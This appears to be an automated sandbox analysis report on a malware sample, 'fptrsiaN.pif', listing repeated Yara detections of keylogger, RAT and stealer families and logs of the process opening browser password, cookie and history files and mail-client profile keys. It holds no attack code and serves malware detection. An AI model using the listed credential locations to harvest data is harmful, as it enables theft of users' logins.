Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3000201227.000000001D40F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\Libraries\fptrsiaN.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
